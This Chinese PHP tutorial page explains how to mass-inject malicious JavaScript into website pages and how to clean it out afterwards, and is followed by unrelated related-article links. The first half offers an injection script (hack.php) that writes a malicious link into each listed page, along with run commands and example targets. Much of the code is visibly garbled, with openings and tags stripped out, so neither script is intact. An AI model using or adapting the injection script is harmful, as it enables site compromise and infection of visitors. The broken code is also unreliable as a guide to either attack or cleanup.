php下批量挂马和批量清马代码

为了防范网络黑客的攻击,网站管理员需要了解网站被挂马后的处理方式。一般在PHP语言下,网站被挂马的原因是服务端的文件有漏洞,或者被管理员账户密码泄露,网站的代码造成的后果就是在用户请求页面时,程序会在页面HTML代码中嵌入一个恶意脚本或链接,使得用户在访问页面时会自动执行恶意脚本或链接,从而感染用户的电脑或手机。下面我们将为您介绍如何通过PHP代码来批量挂马和清马。

批量挂马代码

  1. 首先,使用以下命令创建一个新的PHP文件批量挂马:

shell
vi hack.php

  1. 写入以下代码,获取目标网站HTML页面并向其中插入恶意JavaScript代码:

```php
\n"; $js .= "var link = document.createElement('a');\n"; $js .= "link.href='".$shell_url."';\n"; $js .= "document.body.appendChild(link);\n"; $js .= "\n";

// 将生成的JavaScript代码插入到目标网站页面中
$html = str_replace("",$js. "", $html);
$handle = fopen($url, "w");
fwrite($handle, $html); // 写入添加恶意链接的页面代码
fclose($handle);
}
?>

```

以上代码中,$urls是包含目标网站URL链接的txt文件,$shell_url是恶意JavaScript链接。代码中首先读取URL列表文件,然后循环遍历每个URL链接中的页面,将恶意代码插入到HTML中,最后将修改后的HTML页面写回到服务器中。

  1. 运行挂马脚本 hack.php ,执行以下命令:

shell
php hack.php

运行后,PHP脚本会根据 urls.txt 文件内的URL信息,将恶意脚本插入到每个HTML页面中。

示例:我们将 urls.txt 文件设置为包含两个URL链接:

https://example.com/page1.html
https://example.com/page2.html

运行脚本后,PHP会替换每个HTML页面文件中的 </head> 元素标签下部分,使用以下代码将恶意链接插入HTML页面中:

```html


```

批量清马代码

  1. 首先,使用以下命令创建一个新的PHP文件批量清理马:

shell
vi clean.php

  1. 写入以下代码,用于批量清理所有PHP文件中的恶意脚本:

```php

.*?<\/script>/si", "", $file_contents);

   // 将处理后的内容写回到文件中
   file_put_contents($file, $cleaned_contents);

} ?> ```

以上代码中,首先定义了 search_files 方法用于递归查找目录下符合条件的文件,然后定义了 $start_dir 文件起始路径和 $regex_pattern 要查找的文件后缀,最后通过正则表达式匹配所有包含恶意脚本的PHP文件,将里面的脚本部分删除并保存修改后的文件。

  1. 运行 clean.php 脚本,执行以下命令:

shell php clean.php

执行该命令后,PHP会查找包含指定后缀的PHP文件,并将其中的恶意脚本删除。

示例:有一个被挂马的PHP文件 foo.php,既包含正常PHP代码也包含恶意代码:

```php

... ...



```

在运行清理脚本之后,上述PHP文件中的恶意脚本代码将被移除,只剩下正常PHP代码:

```php



...


...

```
以上就是批量挂马和清理马的完整攻略。

本站文章如无特殊说明,均为本站原创,如若转载,请注明出处:php下批量挂马和批量清马代码 - Python技术站

(0)
上一篇 2023年5月23日
下一篇 2023年5月23日

相关文章

  • PHP实现简单的协程任务调度demo示例

    PHP实现简单的协程任务调度是通过PHP的协程扩展实现的。下面是实现简单的协程任务调度的完整攻略。 1. 环境准备 首先需要安装Swoole扩展,并开启–enable-async-redis编译选项。可以通过以下命令安装: pecl install swoole_async_redis 2. 实现代码 <?php function coroutine…

    PHP 2023年5月23日
    00
  • php数组函数序列之array_values() 获取数组元素值的函数与方法

    PHP数组函数序列之array_values() 获取数组元素值的函数与方法 基本介绍 array_values() 函数返回一个包含给定数组的所有值的新数组,而不包括该数组的键名。 语法 array_values(array $array): array 参数 array:必需。规定要返回值的数组。 返回值 返回包含数组中所有值的新数组。 示例说明 示例一…

    PHP 2023年5月26日
    00
  • 全面屏时代的微边框 戴尔XPS 15-9570笔记本电脑详细图文评测

    全面屏时代的微边框 戴尔XPS 15-9570笔记本电脑详细图文评测 背景 在当今科技发展日新月异的时代,全面屏手机越来越普及,各大电脑厂商也纷纷推出了全面屏电脑。而其中,戴尔的XPS系列被称为全面屏电脑的代表之一。本次评测将详细讲解戴尔XPS 15-9570笔记本电脑的特点和性能,为大家提供选购参考。 特点 微边框设计 全面屏电脑的最大特点就是采用了微边框…

    PHP 2023年5月27日
    00
  • Redis分布式锁的正确实现方法总结

    Redis分布式锁的正确实现方法总结 背景 随着高并发应用的逐渐普及,分布式锁也成为了越来越多的关注点。Redis作为一个高效的缓存工具,其提供的分布式锁凭借着其性能和易用性,被越来越多的项目所采用。然而Redis的分布式锁并非完全可靠,采用不正确的方式很容易引发死锁等问题。因此,本文旨在总结Redis分布式锁的正确实现方法,以帮助开发者更好地使用Redis…

    PHP 2023年5月27日
    00
  • 详解php反序列化之字符逃逸法

    详解php反序列化之字符逃逸法 在介绍php反序列化中的字符逃逸法之前,需要先了解序列化和反序列化的基本概念。所谓序列化是将一个对象转换成一个字符串,反序列化是将一个字符串转换成一个对象。当两个系统需要交换数据时,就需要序列化和反序列化。php的序列化函数是serialize(),反序列化函数是unserialize()。 在php中,当序列化一个类时,会将…

    PHP 2023年5月26日
    00
  • php写的简易聊天室代码

    下面是关于用PHP编写简易聊天室代码的完整攻略。 一、准备工作 在开始编写代码之前,需要确认电脑上已经安装好了web服务器(如Apache)和PHP解释器。另外,需要创建一个空白的文本文件,用来保存代码。 二、创建HTML页面 首先,我们需要创建一个简单的HTML页面,用来显示聊天室界面。代码如下: <!DOCTYPE html> <htm…

    PHP 2023年5月24日
    00
  • 如何在旧的PHP系统中使用PHP 5.3之后的库

    在旧的PHP系统中使用PHP 5.3之后的库,需要注意以下几点: 检查当前PHP版本:在使用PHP 5.3之后的库之前,首先需要检查当前PHP版本是否支持使用这些库。可以通过在代码中使用phpversion()函数来获取当前PHP版本号。 echo phpversion(); // 输出PHP版本号 检查库依赖:在引入PHP 5.3之后的库之前,需要检查该库…

    PHP 2023年5月23日
    00
  • php array_slice 取出数组中的一段序列实例

    下面是关于“php array_slice 取出数组中的一段序列实例”的完整攻略,包含示例说明。 基本语法 array array_slice ( array $array , int $offset [, int $length = NULL [, bool $preserve_keys = false ]] ) 函数说明 php中的array_slice…

    PHP 2023年5月26日
    00
合作推广
合作推广
分享本页
返回顶部